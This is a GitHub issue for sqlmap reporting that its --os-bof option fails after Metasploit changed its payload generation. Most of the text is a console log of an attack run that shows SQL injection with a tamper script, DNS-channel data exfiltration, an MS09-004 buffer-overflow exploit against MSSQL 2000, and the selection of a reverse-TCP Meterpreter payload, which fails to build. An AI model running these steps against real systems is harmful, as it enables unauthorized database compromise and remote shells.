--os-bof doesn't work due to msf changes #2306

mmetince opened this Issue Dec 15, 2016 · 0 comments



It seems msf has changed their payload generation parameters.

root@root:~# sqlmap -r /tmp/a.txt --dbms MsSQL --technique BS --tamper space2comment -p [SECRET] --dns-domain [SECRET]  --os-bof
 ___ ___[)]_____ ___ ___  {1.0.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:14:13

[06:14:13] [INFO] parsing HTTP request from '/tmp/a.txt'
[06:14:13] [INFO] setting up DNS server instance
[06:14:13] [INFO] loading tamper script 'space2comment'
[06:14:13] [WARNING] you did not provide the local path where Metasploit Framework is installed
[06:14:13] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[06:14:13] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[06:14:14] [WARNING] provided value for parameter 'txtPhone4' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[06:14:14] [INFO] testing connection to the target URL
[06:14:14] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
Parameter: [SECRET] (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: [SECRET]
[06:14:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[06:14:14] [INFO] testing Microsoft SQL Server
[06:14:14] [INFO] confirming Microsoft SQL Server
[06:14:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[06:14:14] [INFO] going to exploit the Microsoft SQL Server 2000 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004)
this technique is likely to DoS the DBMS process, are you sure that you want to carry with the exploit? [y/N] y
[06:14:22] [INFO] fingerprinting the back-end DBMS operating system version and service pack
[06:14:22] [INFO] testing for data retrieval through DNS channel
[06:14:23] [INFO] data retrieval through DNS channel was successful
[06:14:23] [WARNING] unable to fingerprint the underlying operating system version, assuming it is Windows 2003 Service Pack 2
[06:14:23] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '[SECRET]' (detected)] 
which local port number do you want to use? [6374] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[06:14:36] [INFO] creation in progress ...... done
[06:14:42] [CRITICAL] failed to create the shellcode (No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 336 bytes Final size of exe file: 73802 bytes )